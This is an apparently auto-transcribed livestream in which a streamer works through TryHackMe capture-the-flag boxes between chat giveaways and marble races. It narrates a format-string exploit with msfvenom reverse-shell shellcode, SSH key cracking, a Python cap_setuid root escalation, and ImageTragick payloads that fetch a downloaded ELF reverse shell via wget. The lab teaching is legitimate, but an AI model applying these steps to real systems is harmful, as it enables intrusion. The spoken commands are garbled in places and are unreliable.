exploit DB. All right, open Captain Chest. Well done, Shills Up, Redacted, and Tim GTA 5. Go back to the map. This is going to be a hard battle, so I'm going to need everybody. And I'm going to actually put one of my stronger units out, I think. Archer time. This one is so annoying to get working. Why did someone select this as an easy? Why do you lie to me, chat? Why are you so mean to the newbies? Alright, this has a walkthrough, I guess. Oh, it's so easy. And here we are, editing Python 2 code. Okay, blah, blah, blah. Al did it in 5 minutes. Well, I mean, we got something. We've got a shell 3 times now. It's just not actually doing anything. Like, the exploit is working. It's just apparently it doesn't like me. Because we've got connections. Look, connected back. Who am I? Nothing. Connected back. ID. Nothing. Like, this was working. We've had shells, yeah, three times. I mean, I say shells. We've had connections 3 times, and then it's just gone. And I don't know why, but I guess we can try and look. This is a format string exploit. I mean, but he told... this is why I don't like people who write exploits for exploit DB, because literally this is the command he says to run. These are the banned characters, so these characters shouldn't appear in here. So I don't really understand... You know, if you're going to put shellcode in here... if you're going to put an MSF Venom thing in there, make sure it actually works, I guess. Come on, is there a... exploit? Come on. That's literally what I used, though. That's the first thing we used. And it works, but it doesn't give us anything. This was it. See? Shell reverse TCP. That's my IP address. That's the ports. Those are the bad characters. I'm pretty sure they're the same ones this guy uses. 0, 25, and 26. Yep. Python v shellcode. The -v just is the variable name. I mean, let's try it again. Maybe we'll do it 4th time lucky. Everything should be fine. I mean, like I said, we are receiving... We're receiving something. Does he use bees? He does, okay. Yeah, that's fine, I guess. What's this, 15 lines? No, 17. Okay. Python 2. NC. NVLP. x86 is different from x64. So the way to remember, so obviously x86 is the 32-bit processor and 64 is a 64-bit processor, because obviously 86 being 32 makes perfect sense. The way to remember it though is if you're on an 86-bit, if you're on a 32-bit machine, you can't run 64-bit programs. If you're on a 64-bit machine, you can sometimes run 32-bit programs. Most of the time, I think. So 32-bit reverse shells will often work on 64-bit machines, but the reverse is not true. A 64-bit machine, sorry, a 32-bit machine cannot understand 64-bit instructions, which kind of makes sense because one came later. All right, so we've got a listener. Let's. Oh, hang on. Did I already? Yeah. Okay. Boom. So we're not getting anything now. What did I do? I'm gonna say we reset the box because it looks like we've got everything else. Terminate, start machine. All right, let's do a marble run while we're at it. And you know what? Let's do a giveaway. We're gonna TryHackMe giveaway thanks to Gar7. So what we'll do is we'll do a marble race, and the winner will get a 1-month TryHackMe voucher to decide what to do with. What's a good one? The laboratory. Maybe we'll do that. All right. So yeah, the rules are you have to survive to the end, and the first place will get control of what they want to do with the voucher. They can keep it for themselves. Obviously, they can give it to somebody they know, or they can pass it on to second place, or to be honest, any other place they want. Exclamation point play in chat to join. We have 85 people viewing, and there's a voucher on the line, so I expect to see a lot more people playing the game. All right, you got 60 seconds though. Exclamation point play. Again, you don't have to do anything other than type those 5 characters. I do not stress this enough. This is a game that is literally a physics simulator with a bit of RNG at the beginning. But other than that, you don't have to play. You don't have to do anything once you've typed exclamation point play. And you have 33 seconds to join. Even if you don't want the voucher, play because it's hilarious when people knock each other off. And also, even if you do win the voucher, you can just give it to somebody and be nice. Okay, 15 seconds left. Yeah, Killer2224. I mean, like I said, we got a connection back. It's just, I guess, the reverse shell gods did not like me. We'll do it again. Okay. Gifaram off to a good start. Oh. Does it matter which one you choose? It looks like maybe this one. Leonard. Or, sorry, Leo. Leonhard. Oh, no. Leonard? Is that how you pronounce it? Leonhard. Euler? I imagine it's named after the mathematician. I honestly don't know how to pronounce his first name. I've never seen Leonard with an H. And I've always just called him Euler. Alright, KTIL54 doing so well. Going between... Oh, was doing so well. Going between those. Still in first place, but Gifaram is going to overtake. And Team GTA has the current record on this track, apparently. Gifaram is currently beating it as well. Alright, Gifaram needs to find the hole at the bottom. And he has. And he's still ahead of Tim. But will he get Will we get into this hole first? Maybe? Yes. Alright. Oh, that was perfect. Gifaram, what you did right there was amazing, except for what Tim just did right there. Tim's ghost, I should say. But, wow. Gifaram. That was an almost perfect run. And here comes Ascertainment. Oh, sorry, Kato, where did you get there? Lots of people dying. Mysteries. Leonard Euler. Random Whizman is decided to go around again. Big Bison, though. Shields up. Olivier, Pro Tips, and myself. Random Whizman finally decides to come down. Sarsek. Lot of people just going round and round on this thing. You know, I get it. It's fun. But the goal is over here. And you only have 45 seconds. So you should probably just, you know, speed up a little bit. Embargo, you gonna make it? Nope. Embargo's decided to go around again. Probably not a good decision, but there we go. Oh, Embargo, I think, went round again. Maybe. Oh, no, there we go. Embargo decided to join the party, and Redacted now. There is a wall of flames slowly coming for you. Are you going to make it? It looks promising. Well, look at that. Everybody got in. Alright, Gifaram. Well done. So, not only did you beat the stream record, but yeah, you win control of the voucher. So, what do you want to do with it? Do you want it? Or do you want to give it to a friend? Or do you want to give it to somebody else in chat? Entirely up to you. Well, Redacted, you say last place, but there were 4 people who didn't finish. So, I mean, whomever doesn't have one. So, should we just go down the list? KTIL54. If you're in chat, let me know if you want the voucher. You were 2nd place. We're not going to do another race. You have one? Okay. Ascertainment. Let's go back to this box. All right, I'm just gonna. Well, I'm not even gonna update the DNS. I'm just gonna put the IP address in here, and we're gonna hope for the best. Okay, let's do this again. NC MBRP Python 2. Please work. We're definitely connected still, yeah. Really don't. That's weird, Berry Duina. Well, this box is just not working now. I'm gonna remove the payload and just mirror it again, because I wonder if I just, in my haste, I accidentally deleted anything. I don't think I did, but I mean, let's see. Okay. Well, I don't think I did, to be honest with you. Sometimes it works after you restart the box. This is a great box. What a stupid exploit. Alright, okay, this is the right code, right? Yeah, x86. Oh no, hang on. You know what, screw it. We're gonna do the one that worked at the beginning and the one that we said should work. 10 13 2 1 3 5. But I did update the IP address. That was the first thing I did. I changed the IP address. That was the only thing I did that time. After restarting it. Okay, this should be fine. It is 46. 23. 46, 23. Alright. We're going to do NC again. And then we're just going to do Python. Fantastic. It connects and then just dies. Oh boy. What's the freaking... Is there a walkthrough on this? I feel like we've done it, but... The only reason I'm reading a walkthrough is I really want to see what they're doing. They're using the exact same command, except they're just not using... Alright, we'll put the L port as 9001. Not that that should make one bit of difference. Literally the same command as the exploit. We just changed the changed the IP address to my own IP address, which is, actually is working because it wouldn't connect back otherwise. Okay, let's vim this. Go down here. Delete everything. Paste that in. Oops. Okay, now I just need to do NC, but instead of 4444, we're going to do 9001. I'm also just going to test that I can connect to that. 10.13.2.135, 9001. Boom, we can. All good. Run it again. Please work. Oh my goodness. Okay, which Python? Was it just the port? That's the most dumb thing. Oh fuck! Did I just mess it up? Okay, I didn't mess it up. It doesn't have does it have Python 3? It does. Okay. I do not know what. But I mean, doesn't his port use? His port literally uses 4444. Oh, that's ridiculous. And it wasn't like it wasn't hitting the port. It was definitely hitting the port. Okay, we're gonna do bin bash. Okay, we're gonna do Control Z. I'm gonna exit out of this one. STTY size. And then STTY raw-echo, foreground, STTY cols 172, rows 39, export term equals xterm 256 col. Okay, now we have a proper shell. I can cancel and everything. Yeah, I don't really understand why. Alright, but we have a shell. We can probably get user.txt. They've got sudo as admin successful, which means we probably can sudo. Got this really dumb box. Useful exploit. Okay, we don't have Annie's password. Bash history goes to dev null. We can go to this anydesk.sh file and see if there's anything. No. Okay. Is there an SSH? That's the weirdest thing. Like, why would you even have an IDRSA? I guess so you can get back into the box if you've done it. So I guess we should probably just copy that. And maybe we should even just go back onto the box, to be honest. Nope, couldn't. Yeah, so you don't have to do this stupid exploit again. Alright, so I'm going to create a new ID RSA. I should do Annie. because this is Annie's. And SSH-I, Annie at. I obviously didn't. I didn't update the IP, the host name. I need to chmod 600. Annie's key, and that should work. There's a passphrase, really? Oops. Okay. Christy, I know what I'm doing. No backseat hashing. Backseat hashing, backseat hacking. You're faster. You are faster. Very, very good. All right. All right, let's see if we can actually crack this password, because obviously if we crack this password, what it's likely is her sudo password, right? It's her actual password, so... Maybe. Who knows? Exactly redacted. Literally what I just said. You're quick, but you're not as... I'm just saying you're not as quick as Christy, apparently. All right, Annie123 is the password. So can we SSH now? Do this. Yes, and now can we do sudo? Interesting, it's not actually, unless I did it wrong. 1, 2, 3. It's not her password, so literally the point of that was what? Really pointless. Unless, of course, there's another user, or if we su to root, and that's the password. No. All right. I should probably, oh, I didn't even create one for that. Screw it. I didn't put a "we are in." Yes, that's true.
We are in.
Thank you for keeping me honest. Did Ascertainment say they wanted it? Ascertainment, if you're in chat and you want the TryHackMe sub, please let me know. Or if you don't, we'll go down the list. Okay. Anything else interesting in here? Possibly. There's a bunch of different directories, but let's look for some SUID binaries, which I always use this one. Setcap. Wait a minute. I'm pretty sure the setcap sets the capabilities. Doesn't we can set capabilities? There's not even a thing in sbin setcap -h. Yeah. Setcap sets the capabilities on stuff. Okay. Can we just... So if we just click So here's a great tip, by the way. If you don't type anything, but you just click capabilities, these are all the things that are exploitable through capabilities. So Python, for instance. So setcap, SUID. How do we use setcap to set SUIDs? Where is it? Because there's basically there's a capability that basically does exactly the same thing as an SUID. So I guess actually just hack tricks capabilities. To be honest, we'll have it. Linux capabilities, I think, has a list of them. Okay. Cap set UID. I think. Where is it? Come on. Set UID. There we go. This is what we do. So we do set cap underscore set UID plus EP. And then which Python 3. So we can just do which Python 3 actually, which is much easier. That's odd. User bin Python. Value of the capability argument is not permitted for a file. Okay. This may be a symlink actually. Thinking about it, it is a symlink. Okay, so it just goes to Python 3.6 in the same directory. That's why, and that's not a symlink. So all we need to do to fix this is do Python 3.6. Okay, and now we run user bin Python 3.6. Python 3.6, please. Import os.system bin bash -p should work. I need to import os, not od. That didn't work. Hang on, there should be a Python thing for it. Oh, you need to do os.setUID. Yeah, I'm an idiot. Right. You do need to do... No, it's not sudo because it's an SUID file. Oh, I'm still in bash. Whoops, not exit. Right, so I was in that bash prompt. No, it's a capability. You don't need to do anything with SUID. You need os.setUID though. So even though we're running this with a capability, I need to set UID. Capabilities will just run. This file will still run as our user unless we explicitly ask it not to. And the way you ask it not to is in Python you do this. It's os.setUID. All right. There's various other commands. If you make a C or C++ binary. There's another way of doing it in there, but that should work. There you go.
I'm in.
I don't know why I did ls twice.
New subscription received.
Holy crap, there's a
Dispensing
voucher.
Gratitude dispensed.
Olivier Pro Tips, thank you for the Prime sub. Alright, I'm guessing that... Okay, we didn't hear back. So, Mysteries83, are you still in chat? Was it easy? I don't think so. This is definitely a medium, only because the way in is a bit weird. Mysteries83, do you want the TryHackMe sub, or do you want to give it to somebody else? Yeah, this is definitely a medium. It's definitely an easier medium, obviously, but the fact that this exploit seems to... I don't know, it's very iffy. I don't like it. It's an interesting idea. I'm glad that it's here. Okay, Mysteries, well done. Alright, so let me write down your name. Mysteries. I will message you in a Twitch whisper after the stream. And I'll supply you with the month TryHackMe subscription. And I'm guessing this TryHackMe voucher is no longer valid. Look at that. Well, you can try it, I guess. Okay, any questions about any of that box? Other than why didn't the exploit work the first 5 times you ran it? And the answer to that is I have no idea. Your guess is as good as mine. The port numbers should have been fine. And in fact, we did get a connection back 4 times. And then when we changed the port number, it's stable. So I really don't know what was happening. Unless there's maybe a bad character in that that was just missed. Okay, didn't somebody else subscribe? And we didn't do a spin for them. I'm pretty sure. So I'm just gonna make a list. Olivier Pro Tips. Chardron, that's it, Chardron. Alright, so we'll do your spins and then we'll do Stream Raiders. That was a question? What was the question? Annie, are you okay? I mean, clearly the box is not okay. Alright. Alright, okay, the wheel has spoken. I'm sorry. Oh no. That was a well-timed one. Alright, this is Olivier Pro Tips. Olivier, no, I mean, it wasn't blocked. We know it wasn't blocked because we were getting the connection back, right? Type with one hand for 5 minutes. Okay, we'll do that. Yeah, I mean, we know it wasn't getting blocked. We were getting connections, it just wasn't giving us a shell. So, the port wasn't blocked, but I have no idea what was happening. Alright, let's do... What am I doing? Stream Raiders. Was the port already being used? Nope. Again, and like I've said a few times, we were getting connections back. You know? I think I've closed the tabs, but... Yeah, actually, no, here, see? If the port was already being used, we wouldn't get a connection to it. Although that's technically not really the case. It's if the port is effectively only listening for one. Sorry, if the port's been listening and it's already caught something, then yeah. Ports are weird like that. Alright, we'll do Dream Raiders. Because a lot of people think that once you've caught a shell on 4444, you can't use 4444 again. That's wrong. You can. When you're listening for something on a port, you can only catch one thing. for Netcat, for instance. But as soon as you've caught it, if you run Netcat again on another terminal, you can listen on port 444 again. There's no limit. Because if you think about it, if there was, how would web servers work? Web servers listen on port 80, and you can connect to web servers multiple times at the same time. If they didn't, then the internet would be chaos. Everyone would have to wait for people to give up their connections. Well done, Ascertainment, Giffaram, and Big Bison. Let's connect some Saint Scrolls and some Musketeer Scrolls, and we'll keep going. And we'll do one more box today, I think. Alright, so we'll do another poll. Ascertainment, you wanna TryHackMe voucher, but then you wouldn't respond in chat, so it didn't go to someone else. Do apologize, maybe you were away, but we did ask you a few times. Better luck next time. 2 minutes. Alright. There are the 3 remaining boxes in the list. Choose one. And we'll do that as the last box. Okay, I'm glad you already subbed, because I would have felt bad if you were just away and missed your chance. Any more questions about that? Capabilities are weird. So yeah. It's really all you need to say about capabilities. They're basically, think of them as SUID light. They're much less powerful. Well, they're less powerful and more powerful than SUID, depending on how you look at it. They're less powerful because just because a file has capabilities doesn't mean you can get a root shell out of it, or anything, or privilege escalate, in fact. But they're more powerful because you can effectively, instead of an SUID running everything as root, the entire file, you can run effectively parts of a file as root. Alright. It's nice to see the whole, hey, let's make the poll tie meme come over from Al Hazred streams. It's very much appreciated. I feel like I've made it as a streamer. No, someone needs to vote for Magician. And then we'll need to flip a 3-sided coin. Okay, I'm gonna vote for Magician. There we go. Oh no, someone else did. Oh, well, actually, okay, 2 people did. All right, so Magician did win. I was gonna feel bad for a moment. All right, we'll do Magician. I was only trying to keep the meme alive, chaps. All right, Magician. I already have a feeling I know what this is going to be about. It's probably going to be image magic. Which, if you don't know what image magic is, it's a really useful tool. 7 minutes to start up. Well, you know what that means, chat. More marbles. Could be magic bites, I guess. MSF Venom is okay for any cert like OSCP. No, MSF Venom you can use for OSCP. You can use, I think, there's a few programs you can use in the Metasploit framework. MSF Venom you can use for absolutely anything. Multi-handler you can use for absolutely anything. You can only use Meterpreter once. And that includes if you generate an MSF Venom Meterpreter payload. You can only that counts as your usage, basically using that payload. And I think there's a couple of scripts for doing the offsets for buffer overflows, but honestly, you really shouldn't use them. You should use my room on TryHackMe because my method is much better. All right, let's do the delta. I like everyone typing play, even though we haven't actually loaded it. Alright, everyone type play. Exclamation point play. Hopefully Barry Duina gets in here this time. I don't know how you screwed up last time, Barry Duina. It's definitely your fault, though. There you are, look. Maybe I should just kick you. No, MSF Venom doesn't count. The rules, as far as I'm aware of them, you can't use Metasploit exploits, or you can use it once, or you can use Meterpreter once. You can use an exploit or Meterpreter once, but you can use multi-handler within MSF console to catch reverse shells. You can use that as many times as you want. And you can use MSF Venom to create non-Meterpreter payloads, because MSF Venom can create any kind of shell, right? So you can definitely use it for that purpose. There's no restriction on that. The only time it's not, anytime you're limited is if you run an actual exploit in Metasploit, or if you use Meterpreter. And obviously Meterpreter is, either a compiled MSF Venom version of Meterpreter, or if you use it as part of an exploit. Alright, we'll start a 60-second countdown. 28 players. You got 60 seconds to continue. And then after that, I got to remember, I got to type with my hand, one hand for 5 minutes, which is going to be lovely. All right, this is going to be the last box today, by the way. We'll probably be able to finish it in the next hour, I hope. The Limpies thing was kind of limited. I only know of one person who didn't pass, and we caused such a fuss on Twitter that they reversed the decision. I believe that was Superhero who didn't pass and then did, because honestly, I half led the charge on that. I just got really pissed on Twitter. Because it was a really bullshit excuse that they OffSec were using, where basically they were like, if it's your fault if you don't know what the file you're running does, and I'm sorry, but Linpeas has got to be over 10,000 lines of code, and it's a privilege escalation enumeration tool. You're not going to read 10,000 lines of code. It tells you what it does. It just happened that one of the checks to just determine if a privilege escalation was there actually exploited the privilege escalation. Shields up. Nope, Cyber Samurai's still in first place, but actually shields up now. This is an interesting track because it's got these sides. At least, oh, that wasn't good. Shields up. You kind of launched yourself there. But you seem to be okay. Agent OP is coming in. Oh, just grazed. Oop. Yeah, Agent OP, but shields up is maybe... Oh, who? What? That was Agent OP. That was so freaking close. You can't even see the difference between shields up and Agent OP. That must have been... I want to see the... You were... You were 0.011 seconds ahead. That is the closest I think I've seen it. That was incredibly close. Alright. We'll do another one because the box said 7 minutes. So let's go back to the race menu. Let's do one that's not just a stupid race course, maybe. The gauntlet sounds fun. Screw it. Alright, exclamation point play again. If you want to play. I'll give you guys 60 seconds again. Alright, 30 seconds. We have 26 people in. 15 seconds left. Alright. You guys are going to take a while to get down the hole, I think. So I'm just going to have a look at this track. Oh, yeah, this is definitely a gauntlet. Okay. Oh, and it looks like there's a jump at the end, look. Ooh. All right, who's going to be out? Who's going to be out first? Place your bets. Place your bets in chat. Who is going to be out first? You said Rickard. You're correct. But Particle de Dieu. Oh, actually, no. Leonard and Cave Dweller. Oh, Cave Dweller's going backwards. That's not the way you go. So Leonard, Euler, actually Agent OP. Agent OP, fresh off their win, has decided, you know, screw it. I'm going to be the champion again. But Leonard's having none of it. Now, Leonard, can you find the right hole? No, Agent OP found it. But Agent OP's going backwards. Leonard kind of is still. But Leonard at least has found this bit. Taking the left path. Always a risky decision. Leonard's just way ahead of everybody. Alright, Leonard, which way are you going to go? Right path this time. Alright, good decision. Agent OP also taking the left path. Now, the only thing you got to do is you got to make sure you make the jump at the end. Oh yeah, and this place has those weird freaking things that pop up and down for some reason. Leonard is having the weaving tactic, and it is working very well. Agent OP is just miles behind. This is the Leonard Euler show right here. Alright. Final turn here before the launch. Oh, hits one. And another one. But will you make it? And he does. Agent OP. Trying to see if they're doing it. Agent OP flying in. I think Agent OP made it. Leonard is just hanging out here, though. Oh, lots of people just dying. Shields up! Shields up! Coming out of literally nowhere. Leonard Euler comes second, Agent OP third, but where the hell did Shields Up come from? I was literally looking at Leonard, and then Shields Up just flew past him. I don't think you even made it into the bowl. I think you went straight over the top. Throwmaster comes fourth. I am Uber. Killer. Dodo Fett. Okay, Mysteries. I'm there. A few other people. Okay, who's in last place? MSEC. What are you doing? Alright, we'll follow you. Oh, just hitting everything. Just, come on. Make the jump at least. Come on. Yes. No. How did you do that? I think you just got up here. Jeez. Alright. Well, at least these people are probably... That looked like it was going to go in, and you just... I'm pretty sure you got flung upwards after the tunnel. Okay, K-Till 54. You got 47 seconds. You're just hanging out there. You can see the fire coming already. You got to get moving. Oh, here he goes. All right. You're going to make it. You're going to make it. All right, we're good. Well done. Well done, Shields Up. Incredible. Okay. All right, I think we have enough time. We need to set the host name of Magician. Okay, so that's interesting at least. All right, address equals Magician. DNS mask restart. Okay, let's make directory Magician. CD into it, and we'll do a recon on Magician. Master, thank you for hanging out. Go enjoy your beer. Okay, we got port 21, which is obviously FTP, so the first thing we should probably do is see if we can connect as anonymous. Maybe. Doesn't look like it. So if we do it again, we do anonymous with the password anonymous. Sometimes that works. Doesn't look like it. Right. No anonymous access. We do have port 8080. Magician port 8080. I should probably put an HTTP before that. I'm guessing this is going to be... No, okay. I mean, it is an error page. So it is a web server, at least. But I don't know... Okay, there's 8081 as well. All right, maybe this is a web page that we need. Okay, that looks a lot better. All right, PNG to JPEG converter. It works like magic. I think I have a few in my downloads. Some images. Maybe. Or is it desktop? Pictures. Oh, there we go. I got a lovely PNG to convert. Select the PNG. Look at this handsome chap. All right. We're going to convert the PNG to JPEG with the power of magic. And there it is. And we can just download that. You know what? We'll put it... Why don't we put it in the directory as well? We're going to move it from downloads, pib.jpg, into pictures. There we go. And then we're just going to copy it. Tib JPEG to here. Use exif tool on this, and then we can see, is there anything interesting? I imagine it's not going to be as easy as image.jpg.php, to be honest with you. Is there anything in here that tells us what it used to do the conversion? Maybe not. But did this at all? Little CMS? Oh yeah. Maybe no. I don't know. Open source color engine. Yep, you're right. To be honest, what I should have done is probably stripped all the exif data first. Oh no, actually, maybe I did. Hang on. Pictures, tib. Oops, PNG. No, okay. Let's strip all the data first. So, exif. Can you do exif tool? Remove all metadata. Yeah, you can. Okay. Exif tool. All dash equals. There you go. So let me go into pictures. Exif tool. Oh, come on. Why did that not work? Copy. Exif tool. Pib.png. Alright. So now... Yeah, we have... There we go. Tib png underscore original. So now if we do exif tool on tib... png underscore original. No. Right. That's better. So we're going to remove tib.jpg because that's still got the metadata. So what we want to do is have a completely new metadata free image. And I think we actually we need to reload this. Okay, select is this one. Upload and convert. Good. Okay. Okay. So actually, there isn't really any data here that tells us what it's doing. Alright, so let's have a look back at our scans and see if there's anything useful here. We kind of just jumped headfirst into it. Let's have a look at the TCP scan. Again, nothing. Okay, we've got an error message there. Nothing there. Okay. Nothing really interesting, unfortunately. So yeah, there's... It is kind of weird. The name of the box suggests image magic, but there's no real evidence that image magic's being used. Which is honestly kind of weird. Suppose we can go to the files directory and have a look and see if we can see anything interesting. No. Go on the page source. Is there anything useful in here? We can go into the app file, assuming there's no main. Just scanning it. Yeah, I don't see any... I wonder if it is just a simple bypass. So if we try and put, for instance, PHP info. So I assume this is a PHP page? No, it's not. Oh, we can always just try it and see what happens. .php. We uploaded it okay. And then if we go to files, tib.png.php, I think, right, was it? No. Oh, because it renames it. There's actually a get... Yeah, we do this. Right, so yeah, and unfortunately it does append .jpg. Or rather, I should say it strips off the characters and then puts a .jpg on. So we could try doing %00. Although I really doubt that's going to work. No, didn't work at all. Yeah, we could. Since we know the image is being passed to probably a command line thing, assuming we could probably try and do something like sleep 5. Doesn't like that worked. We could try something like this. Didn't work. I am... I went into this thinking because of the name of the box, it was going to be obvious that it was Image Magic doing the stuff. But now I'm not so sure. However, it's probably worth trying some of the Image Magic. Image Magic convert exploit. Image Tragic, here it is. This is Magician on TryHackMe. Night, Chadron. This is from 2016 though. The Image Tragic stuff. Problem is, we need to give it a PNG at the start. Okay. This looks interesting. This is saying it can convert. Yeah, here we go. By creating the file test.png, which contains an SVG file. Okay. Arbitrary file, right. Okay. Interesting. So we don't even really need to exploit this. What we can do is we set up a Python HTTP server. Go here. Let's remove all this crap. We'll keep some of it, I guess. Actually, no, we can't. No, right. We do this, and then we put my IP address in here. So we need 10.13.2.135, 10.13.2.135, 8,000 exploit, and then we just write it to, I don't know, temp/test. Should probably not do that, but we did not get anything. Yeah, alright. That didn't work. I'm honestly kind of weirded out by this box. Mostly because I don't see... For an easy box, I don't really understand how you're supposed to figure out what to do. If you understand me correctly. An easy box should at least point you in the right direction. This doesn't seem to be at all. There's nothing... Unless the... Yeah, I don't know. Does it just detect anything? Like if we do that? Okay. Interestingly, it didn't put a .jpeg on the end of this one. Alright, we'll do Stream Raiders. Probably the last Stream Raiders. Interesting though, I don't really... My thought is... It's gotta be something... with the file name, because it looks like it's not even checking anything, really. Question is... Will that help? And what's the FTP thing about? Anyone in chat got suggestions? Alright. But ascertainment, randomizement, and give around. Okay, that'll be enough of that. Yeah, so it was interesting. I wonder what happens if we do something like test, tib.test. Oh, okay. Wait a minute. What? Oh, no. What am I talking about? No, it does. Okay, it has uploaded that, apparently, but I guess I can't see it. Oh, maybe I can. But it just downloads. This is the problem, so it's... I think whatever file you grab in here... So yeah, that was a good suggestion. If we do that, and then do a get, maybe has this gone to up here now? No. It didn't seem to even do anything. It hasn't even appeared in the list, look. I wonder if we do var dub. White label is another thing I didn't think to look up. White label server. And again, this is an old vulnerability, so I don't even know if that's it. Yeah, I don't know. Oh, there was another IP address, wasn't there? There was 8080. Oh, hang on. Are the files all 88? No, okay. The files are 80. Okay, that makes more sense. We're just trying to see if we can even upload a file right now. And white label, yeah, it's probably not PHP. But then I don't really understand. Create the payload with Metasploit? What payload though? Again, we're basically in the dark here. There's no evidence of what it's using to do the conversion at all. It doesn't seem to write anything useful to the EXIF data. So we're just kind of guessing, I guess. You see all the files by going to /files. You can with the, yeah, this one. Why is FTP there? Yeah, I don't know why the FTP is there. And we can't access it. There's no username and password. We don't have a username and password. Yeah, this box is... I don't think this box is even beginner level. Because I'm not entirely sure what we even need to do here. A non-FTP should work? Well, it doesn't. Just hung. Even Nmap didn't find honest. Oh my god. I should have just waited, shouldn't I? Fuck's sake. Quite a patient one. It's a thing called delay successful login. This is a bastard. It is image tragic. Freaking knew it. Might do some little tweaks though. Yeah, I mean, this is not an easy box. Can't bind for data connection. So literally the FTP is just to get this stupid message. How is this box considered easy when we have to do tweaks to image magic? Really don't like it. Alright. I mean, it's just really dumb. How do we do this? So it looks like because we can just upload any file type, we can actually probably do these things. So I wonder if we do this. Right, hear me out. If we put this in a file, we call it password dot, what was it? M something. MVG. Okay, now if we go back here and try this file. Do we get... that's really bizarre. I guess we should try and open it. Where's the password? Oh my god, yeah. It's an actual image of the file. Okay, we're on something now. So can we get Home Magician? Oh, that's going to be annoying, isn't it? No, we can't. We can't just go for homemagician.ssh idrsa because we literally have to type it in. All right, at least we know this. File moving. It's possible to move image files to file with any extension in any folder by using ML Classics. I mean, what about this thing then? So this should... Insufficient shell characters leads to potentially remote code execution. So it executes this. Okay. It's weird that there's like why are the double quotes in the wrong place? I mean, let's just try this, I guess. Whoops. Let's just do exploit. I mean, so can we just do a curl? Like, if I set up the Python, let me just cancel that. Python HTTP server, was it 10.13.2.1 through 5? Okay, that doesn't look like it's doing anything, it's just hanging. Also possible that wget wasn't installed. Oh, sorry, curl. No. Let's just try the one. Let's try the one it said. I mean, we're not going to get a response back, but the -la. All right, that doesn't work. Okay. Okay, let's just try reading some more stuff, I guess. Because we got that working at least. So let's just try... Can I actually render this? I can't, damn it. Alright. Let's see if we can just view a list of directories. Come on. Files. What's the freaking file name? JPEG. Oh, has it done it again? Has it renamed it? Okay, hopefully it's the same. Okay, no. We can't do directory listing. I mean, let's just, I guess, let's try it. I'm gonna copy this so we just can keep pasting it. No. Alright, that doesn't work. Var dub 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 is in there. Yeah, but the problem is, where is it? You know? Like, this is just Magician app. I'm not entirely sure what code this is running, where the file is that runs this. Though we can try index.html or something. But I honestly doubt it. Oh yeah, we could do proc self, yeah. Can you do CWD? You're also assuming that it's you're assuming it's PHP. I don't think it is. Proc self did nothing. Let's just try Environ. No, nothing. Okay. Is there an image? Tragic. What am I doing? RCE. There is, but I'm not sure. Okay. Let's try this. This looks like it actually curls something. But this needs to be a JPEG, it says. Alright, we'll try that. So obviously we'll do HTTP and we'll put our IP address in here, 10.13.2.135, I think. Yeah, 8,000. /exploit. No luck. Remote command execution, image tragic. Okay, this one's okay. This one seems a little easier to understand than the last one it did. So hang on. Let's try this, but let's try the exploit. We'll just treat RCE. So this looks like we can put anything in here we want. So can we just wget 10, 13, 2, 135, 8,000 here? Boy. Nope. Why is this box in the easy ones? Oh, actually, I know why. This This is not going to work. This is going to hang. Ooh, hang on a minute. 10, 13, 2, 1, 3, 5, 8,000. Let's try this. No, okay. I mean, at least it didn't hang, but I don't understand why it's not working either. Fuck's sake. um... I may have to do this box another time, just because this clearly isn't an easy box. Because you wouldn't, I mean, I wouldn't expect newbies to have to mess around with image tragic and shit, especially if it's modified. I don't understand why they put this in easy. Sometimes people who write these think something's easy because they know how it's done. We can try hack tricks. Image tragic. Pay out all the things has some. Okay. I mean, this is what we tried, but we'll try this again, I guess. Come on, why don't you fucking copy when I ask you to? Oh, because of course we can't copy out of that anymore. Alright, I mean, I doubt very much this is gonna work. Oh, wait a minute. We got something. When did that happen? So this worked. Let's send it again. And maybe just wait. Or was it something else you did? No, it has to have been this one. Don't quite understand why it took so long. I just want to see which. Yeah, it can't have been this one. It was the one that got. It was the one that I sent to my own box. So it was this. I just don't know why. Okay. Alright, then let's try just a reverse shell. Oops. Do this. Do 4, 4, 4, 4. And we're just going to put this here. And see what happens, I guess. I don't quite know if it's going to work, but I mean, we definitely made it get something. Because if you see here, we made it get this URL, which is obviously our server, and then we made it fetch exploit. This 404 is because there is no file image on the box. Maybe it's cached something though. Maybe we should do image 2. Oopsie. not entirely sure what happened. What did we trigger? Do we have to download the RCE maybe? I doubt it very much that it triggers when we do this, but... Oh, maybe it doesn't work if we have the same file name. That's a good point. Maybe we need to do RCE2. And it did take a while last time. So we should see it fetch. We should get a code 404 again if it's working. But again, I don't know which. I mean, I sent the same thing a few times. We go back to the logger. I sent it. Sent this one. This. So actually no. This was the one I think worked, or it was this one, or it was this one. There were 3 I sent. It's possibly this one. Can't have been this one because this one wouldn't make any sense. Oh no, maybe. Oh, maybe it was that one. Because maybe that is a 404 as well. Ooh, okay. Let's just do RCE3, HTTPS. Let's do 127.0.0.1. We're going to take this out because I honestly just want to see if we can get it to curl something. Maybe it... No. What am I talking about? Okay, so let's do wget again. HTTP 10 13.2 1 through 5. RC. There we go. Alright, let's change all these. Let's try that bash thing again. I don't know if this is going to work. We may actually have to do bash-c and put this in quotes, but I'm not entirely sure we can. But we'll try it, whatever happens. Yeah. We did get a connection. So we can try another rep shell using maybe what's it, come on, NC, sorry. Okay, use 9001. Yep. Okay, we'll try this. That's just hanging. I wonder then, can we just maybe, here's an idea. Where is it? Let's use MSF Venom, and we'll do this again. We'll do 4444. We don't have any bad shells. We're going to do a format of elf, and we're going to do -o exploit dot elf. And then okay, I need to go into CD into TryHackMe Magician, And that's where the exploit file is. Yep, Python HTTP server. All right. So now what we want to do is do wget HTTP 10.13.2.1.3.5 8000 exploit.elf, and we need to save that, which I believe is -O temp exploit.elf. Okay, so that worked. Now what we need to do is chmod. And what we'll do, I'm not going to use pluses because I don't trust them in this, but we'll chmod 777. And then if we do an NC, maybe if we just run it, it'll work. No. Can we background it maybe? Oh, I didn't change the file name. That might be why. Oh, I didn't change the file name before that. Shit. Okay, hang on. Let's try that. RC6, and then we'll just run it. I think it was the file name that was the issue. No, okay. Oh, this is annoying. Can I do an ampersand there to background it? Maybe 7. Really dumb. We have it working. Rev shell gen. We do bash 2, is that? This is not right. Problem is I don't know if that saved it properly. There's no way to check either. wget-h. It is capital O, right, to save. Yes, capital O. So it should have saved it, but then for some reason it's not liking... There isn't a Does the order of arguments matter? I really don't know. No, it shouldn't for wget. But maybe I should have done that. Maybe. Let's just try. Can you copy your public key into the authorized? Maybe. That would, yeah, that might work actually as well. It was SSH enabled though. It wasn't, so that wouldn't work at all. I'm just gonna try this. 